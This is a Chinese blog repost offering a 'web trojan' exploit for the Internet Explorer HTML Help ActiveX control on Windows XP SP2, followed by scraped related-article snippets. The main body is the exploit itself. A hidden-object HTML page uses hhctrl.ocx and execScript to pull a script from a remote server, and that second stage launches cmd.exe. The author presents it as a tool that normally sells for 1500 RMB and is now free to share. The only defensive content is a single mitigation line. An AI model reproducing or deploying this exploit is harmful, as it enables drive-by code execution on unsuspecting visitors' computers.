最新Help ActiveX控件网页木马

最新推荐文章于 2024-04-20 22:24:22 发布
原创 最新推荐文章于 2024-04-20 22:24:22 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#command #object #button #menu #internet #security

博主分享了一个在winxp xp2下的未修补漏洞,若windows不在C盘则利用会失败,还给出解决方案,即在Internet Explorer中将所有区域的安全级别设置为“高”,并贴出相关代码供火狐用户分享。
这个东西很多人拿来卖钱,听说要1500 RMB,嘿嘿! 现在我把它贴出来,

给火狐的弟兄分享。在winxp xp2 下成功! 当然如果你的windows 没有在c

盘的话,就一定会失败!  最后谢谢 蓝魔~~~
  
                                                                ---- by 浩天大侠


This unpatched vulnerability is a variant of the "Auto SP2 RC Exploit"

Solution : Set the security level for all zones to "High" in Internet Explorer

//  index.htm  //

<html><head></head>
<OBJECT style="display:none" id="locate" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm
::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(/"
<script language=///"javascript///" src=///"http://server//htm.txt///"/"+
String.fromCharCode(62)+/"</scr/"+/"ipt/"+String.fromCharCode(62))")'>
</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout
("window.opener=null;window.close()",10000)</script></body></html>

//  htm.txt  //

document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'>
</object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<param name=command value=close></object><script>a.Click/(/);b.Click/(/)</script>");

// Original Advisory  
网马制作很好啊.。。。。。。
11-25
这段代码用于加载一个外部的ActiveX控件`mm.exe`,并且设置其宽度和高度为0。 #### 4. 文件与目录结构 - **文件结构**:文中提到了多个文件的使用,例如`mm.exe`、`mm.htm`等。这些文件的组织方式对于整个系统的...
windows清除助手
12-18
`msinet.ocx` 是一个ActiveX控件,主要用于Internet相关的功能。在“Windows清除助手”中,它可能用于从网络获取更新的病毒数据库,或者上传可疑文件以进行远程分析,以确定其是否为恶意软件。 综上所述,“Windows...
ARP病毒加的网址利用雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞传播Worm.Delf.yqz...
caobihole
06-11 164
endurer 原创2007-06-11 第1版 今天在使用Web邮箱时,Kaspersky报告:/---已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm---/ Google搜索了一下,发现此代码是一种ARP病毒添加的。 检查发现网页都被加入了代码:/---<iframe SRC="hxx...
ARP病毒加的网址利用雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞传播Worm.Delf.yqz
Purpleendurer@优快云
06-11 3305
endurer 原创2007-06-11 第1版今天在使用Web邮箱时,Kaspersky报告:/---已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm---/Google搜索了一下,发现此代码是一种ARP病毒添加的。检查发现网页都被加入了代码:/---<iframe SRC="hxx
防范黑客木马
weixin_30737363的博客
03-11 815
转自:http://bbs.51testing.com/thread-124374-1-1.html、 即使是很好的实现了TCP/IP协议,由于它本身有着一些不安全的地方,从而可以对TCP/IP网络进行攻击。这些攻击包括序列号欺骗,路由攻击,源地址欺骗和授权欺骗。本文除了介绍IP欺骗攻击方法外,还介绍怎样防止这个攻击手段。 上述攻击是建立在攻击者的计算机(包括路由)是连在...
黑客技能学习全部资料,专门为菜鸟和小白准备的哦。,2024年最新系列篇
2401_84264429的博客
04-20 815
由于系统默认的NTLM为2,所以想用你得到的帐户登陆,要么在自己系统上也建立一个用户名密码都一样的帐户,要么想办法更改对方的NTLM。由于系统默认的NTLM为2,所以想用你得到的帐户登陆,要么在自己系统上也建立一个用户名密码都一样的帐户,要么想办法更改对方的NTLM。克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account\Users下的子键名,另一处是该子键的子项F的值中。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。
Windows Internet服务器安全配置
weixin_30457551的博客
01-10 103
Windows Internet服务器安全配置 原理篇 我们将从入侵者入侵的各个环节来作出对应措施 一步步的加固windows系统. 加固windows系统.一共归于几个方面 1.端口限制 2.设置ACL权限 3.关闭服务或组件 4.包过滤 5.审计 我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统. 1.扫描 这是入侵者在刚开始要做的第一...
好多编程文章
深之JohnChen的专栏
10-12 7572
中文http://www.vccode.com http://www.vckbase.com http://soft.yesky.com/SoftChannel/72342371928375296/index.shtml http://www.youkuaiyun.com/develop/ http://www.comprg.com.cn/titl_jpwz1.htm http://www.pconline.
bios报警声音大全 破除网页鼠标右键禁用的十大绝招 windows任务管理 xp优化
soilblack2012的专栏
11-08 1648
BIOS报警声音大全 AWARD BIOS响铃声的一般含义是:1短: 系统正常启动。这是我们每天都能听到的,也表明机器没有任何问题。 2短: 常规错误,请进入CMOS Setup,重新设置不正确的选项。 1长1短: RAM或主板出错。换一条内存试试,若还是不行,只好更换主板。 1长2短: 显示器或显示卡错误。 1长3短: 键盘控制器错误。检查主板。 1长9短: 主板Flash RAM或EPR
microsoft html 帮助执行程序,HTML帮助中漏洞可能允许执行代码
weixin_36332394的博客
06-10 1037
本文的目标读者:使用 Microsoft Windows 的客户漏洞的影响:远程执行代码最高严重等级:严重建议:用户应立即应用此更新。安全更新替代:无注意事项:Microsoft 支持库文章 890175 说明了当前客户安装此安全更新时可能遇到的已知问题。 此文章还介绍了有关这些问题的建议解决方法。Windows NT Server 4.0 和 Windows NT 4.0 Terminal Se...
CMD
m886986的专栏
02-16 995
 actmovie.exe actmovie.exe是微软Windows操作系统自带的程序,用于支持显示卡运行一些屏幕保护和微软程序。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题 agentsvr.exe agentsvr.exe是一个ActiveX插件,用于多媒体程序。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。 alg.exe  alg.exe是微软Windo
天天卫星网络电视V7贵宾绿色版发布
在此软件中,“1.hta”极有可能是核心运行引擎,负责加载播放列表、解析直播流地址(如M3U8、RTMP、HLS等协议)、集成播放器控件(如VLC Web Plugin或ActiveX组件),并提供用户交互界面。由于HTA支持本地运行且无需...
恶意软件查杀助理V11.05
09-17
7. **msinet.ocx**:这是一个ActiveX控件,通常与网络交互有关,可能在软件中用于自动更新病毒库或者其他在线服务。 总的来说,"恶意软件查杀助理V11.05"通过结合这些组件,提供了一个全面的防护解决方案。它不仅...
2025高校毕业生就业分析[项目代码]
01-01
2025年高校毕业生人数再创新高,达到1222万人,同比增加43万,就业市场面临总量压力与结构性矛盾交织的复杂局面。青年失业率攀升至17.8%,传统行业如互联网、房地产岗位缩减40%-80%,而新兴行业如人工智能、新能源人才缺口巨大。高增长行业如人工智能、新能源、半导体等提供高薪机会,但技能与岗位需求脱节问题突出。学历溢价持续存在,高学历者如清华大学毕业生平均月薪1.33万元,而文科专业就业率不足40%。地域上,东部沿海竞争激烈但机会集中,中西部则因政策扶持新兴机遇。政府通过扩岗补助、职业技能培训等措施缓解就业压力,高校调整学科专业,企业推行校企协同与灵活用工。毕业生需主动适应市场变化,提升技能,关注中西部新兴产业机会,调整职业心态与长期规划。未来技术变革与政策将持续重塑就业市场,创造新的就业空间。
system-permission-loader
最新发布
01-01
system-permission-loader
基于TTCN3的MQTT协议一致性自动化测试框架:客户端与服务端规范验证套件
01-01
物联网通信协议测试是保障各类设备间实现可靠数据交互的核心环节。在众多适用于物联网的通信协议中,MQTT(消息队列遥测传输)以其设计简洁与低能耗的优势,获得了广泛应用。为确保MQTT客户端与服务端的实现严格遵循既定标准,并具备良好的互操作性,实施系统化的测试验证至关重要。 为此,采用TTCN-3(树表结合表示法第3版)这一国际标准化测试语言构建的自动化测试框架被引入。该语言擅长表达复杂的测试逻辑与数据结构,同时保持了代码的清晰度与可维护性。基于此框架开发的MQTT协议一致性验证套件,旨在自动化地检验MQTT实现是否完全符合协议规范,并验证其与Eclipse基金会及欧洲电信标准化协会(ETSI)所发布的相关标准的兼容性。这两个组织在物联网通信领域具有广泛影响力,其标准常被视为行业重要参考。 MQTT协议本身存在多个迭代版本,例如3.1、3.1.1以及功能更为丰富的5.0版。一套完备的测试工具必须能够覆盖对这些不同版本的验证,以确保基于各版本开发的设备与应用均能满足一致的质量与可靠性要求,这对于物联网生态的长期稳定运行具有基础性意义。 本资源包内包含核心测试框架文件、一份概述性介绍文档以及一份附加资源文档。这些材料共同提供了关于测试套件功能、应用方法及可能包含的扩展工具或示例的详细信息,旨在协助用户快速理解并部署该测试解决方案。 综上所述,一个基于TTCN-3的高效自动化测试框架,为执行全面、标准的MQTT协议一致性验证提供了理想的技术路径。通过此类专业测试套件,开发人员能够有效确保其MQTT实现的规范符合性与系统兼容性,从而为构建稳定、安全的物联网通信环境奠定坚实基础。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
【负荷预测、电价预测】基于神经网络的负荷预测和价格预测(Matlab代码实现)
01-01
【负荷预测、电价预测】基于神经网络的负荷预测和价格预测(Matlab代码实现)内容概要:本文档围绕“基于神经网络的负荷预测和电价预测”展开,提供了使用Matlab实现的完整代码与技术方案。内容涵盖电力系统中负荷与电价的时间序列预测模型构建,重点利用神经网络(如BP、LSTM、CNN等)进行数据建模与训练,并结合实际电力数据完成预测任务。文档多次强调该资源适用于科研复现与工程实践,尤其适合需要进行电力系统智能预测的相关研究。文中还提到了多个相关应用场景和技术扩展,体现了较强的综合性与实用性。; 适合人群:具备一定电力系统基础知识和Matlab编程能力的研究生、科研人员及从事能源预测、智能电网相关工作的技术人员;熟悉机器学习或深度学习基本原理者更佳;; 使用场景及目标:①应用于电力系统中的短期/长期负荷与电价预测研究;②支撑学术论文复现、课题项目开发及优化调度系统设计;③帮助理解神经网络在时序预测中的具体实现方式与参数调优策略;; 阅读建议:建议结合文档中提到的其他资源(如网盘链接)下载完整代码进行实操演练,重点关注数据预处理、模型搭建与训练流程,配合Matlab工具箱深入理解算法细节,并尝试迁移至其他预测场景以提升应用能力。
C#实现三菱Q系列PLC串口通讯与寄存器批量读取源码
01-01
C#环境下实现三菱可编程逻辑控制器串行通信的编程示例。该代码库提供了通过串行端口与三菱PLC设备进行数据交互的功能模块,支持对多种类型寄存器状态的读取操作,包括输入继电器X、输出继电器Y、辅助继电器M及数据寄存器D等。程序实现了高效的批量数据读取机制,能够通过单次通信请求获取多个连续寄存器的状态信息,显著提升数据采集效率。代码结构采用模块化设计,封装了通信协议解析、数据帧构建及错误校验等底层操作,为工业自动化控制系统中的设备监控和数据交换提供了可靠的技术解决方案。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
EXCEL中日期取月份公式函数
01-01
先看效果: https://pan.quark.cn/s/27011615eb55 在Excel软件中,我们频繁需要进行日期数据的操作,尤其是当我们需要从包含日期内容的复杂单元格文本里提取月份信息时。 本文将详尽阐释如何借助公式以及VBA程序达成这一目的。 现在让我们研究Excel公式的应用方式。 在Excel软件里,存在多种内置函数能够协助我们处理日期。 倘若单元格里的日期格式标准,我们可以直接运用`MONTH`函数来获取月份。 比如,假设日期存放在A1单元格,我们可以在另一个单元格键入以下公式:```excel=MONTH(A1)```这将会返回A1单元格日期的月份值。 倘若日期呈现文本格式(如"2023年4月15日"),则需要先将其转化为日期类型。 能够运用`DATEVALUE`函数并搭配适宜的分隔符来实现:```excel=MONTH(DATEVALUE("1/"&MID(A1,FIND("年",A1)+1,4)&"/"&LEFT(A1,FIND("年",A1)-1)))```这个公式首先定位到"年"的位置,然后提取出年份和月份,最终组合成符合英文日期格式的字符串,随后通过`DATEVALUE`转换为日期,再应用`MONTH`函数。 随后,我们转向VBA编程方面。 在VBA编程环境里,可以构建自定义函数来处理此类任务。 以下是一个基础的VBA函数范例,用于从字符串中提取月份:```vbaFunction ExtractMonth(text As String) As Integer Dim dateParts() As String dateParts = Split(text, "年") If UBound(dateParts) >= 1 Then ExtractMo...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值